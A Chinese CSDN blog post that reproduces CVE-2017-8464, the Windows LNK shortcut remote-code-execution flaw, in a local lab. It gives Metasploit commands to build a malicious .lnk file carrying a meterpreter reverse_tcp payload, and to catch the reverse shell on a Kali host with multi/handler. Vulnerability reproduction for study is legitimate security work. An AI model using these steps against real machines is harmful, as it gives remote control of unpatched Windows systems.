CVE-2017-8464复现(震网三代)

最新推荐文章于 2023-06-10 16:52:53 发布
最新推荐文章于 2023-06-10 16:52:53 发布
阅读量359 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: linux windows 安全漏洞 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49150931/article/details/112730594
版权

CVE-2017-8464复现(震网三代)

影响版本
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008

1. 漏洞利用与复现

环境:
攻击机kali:192.168.228.128
靶机window10 192.168.228.129
Kali终端输入 msfconsole
在这里插入图片描述
搜索漏洞模块 search cve_2017_8464
在这里插入图片描述

使用攻击模块 use exploit、windows、fileformat/cve_2017_8464_lnk_rce
对应参数的设置:
Set payload windows/meterpreter/reverse_tcp
Set lhost 192.168.228.128 (攻击机的IP)
在这里插入图片描述
检查配置是否设置成功 show options
在这里插入图片描述

Targets:默认就可以了他会自动选择,也可以自己选择对应的系统版本
在这里插入图片描述
开始运行,exploit

在这里插入图片描述

注:生成的文件存放在/root/.msf4/local/下 .msf4是隐藏文件夹
可以先将其拷贝到真机或者U盘中(一会将这个文件放进靶机中)
在这里插入图片描述

我这里把他先剪切到/文件夹下然后拖进了靶机中
回到kali 使用监听模块 use multi/handler
在这里插入图片描述

设置响应的配置:
Set payload windows/meterpreter/reverse_tcp
Set lhost 192.168.228.128
Exploit //开始监听
在这里插入图片描述

下面就用到了刚刚生成的文件,将他在靶机中运行、
这个文件,会反弹一个session到kali中
在这里插入图片描述
注:如果没有弹出meterpreter,可以自己选择session进入,session 1
!](https://img-blog.csdnimg.cn/20210117103309287.png)

输入shell,成功控制目标机
在这里插入图片描述
已经成功监听靶机
在这里插入图片描述

Gaowu-
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
三代的P2P网络 ANts P2P
06-06
三代的P2P网络 ANts P2P
震网三代CVE-2017-8464
m0_57379855的博客
03-31 2266
震网三代CVE-2017-8464CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
CVE-2017-8464震网三代)漏洞分析与复现
dgjkkhcf的博客
07-22 3358
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
msf渗透练习-震网三代
weixin_49349476的博客
06-10 1318
震网三代”官方漏洞编号是CVE-2017-8464,利用msf触发漏洞进行利用,可以对目标window系统进行控制
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2009
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
CVE-2017-8464 震网三代复现U盘利用
weixin_52777165的博客
01-16 520
一.影响版本 漏洞影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 服务器系统: Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 二.漏洞复现 攻击机:kali2019.4 IP:192.168.1.12 靶机:win10 IP:192.168.1.3 打开kali终端进入msfcon
CVE-2017-8464(远程执行命令)漏洞
qq_54735393的博客
03-07 317
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
CVE-2017-8464漏洞原理分析
RockHan
01-08 3450
CVE-2017-8464漏洞原理分析 CVE-2017-8464漏洞诞生 CVE-2017-8464 漏洞是MS15-020(CVE-2015-0096)的变体,可绕过MS10-046(CVE-2010-2568)和 MS15-020(CVE-2015-0096)。 CVE-2017-8464漏洞原理 Windows系统使用二进制解析 .LNK文件,当恶意二进...
CVE-2017-8464漏洞复现
nicedreem的博客
02-14 122
CVE-2017-8464复现
CVE-2017-8464 分析
weixin_30814319的博客
12-28 825
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞,iis服务提权工具。
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
CVE-2017-8464 python复现代码
最新发布
06-13
CVE-2017-8464Windows Shell中的一个漏洞,可以被利用来执行恶意代码。以下是Python的复现代码: ```python import os import sys # 首先检查是否为Windows系统 if not sys.platform.startswith('win'): print...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值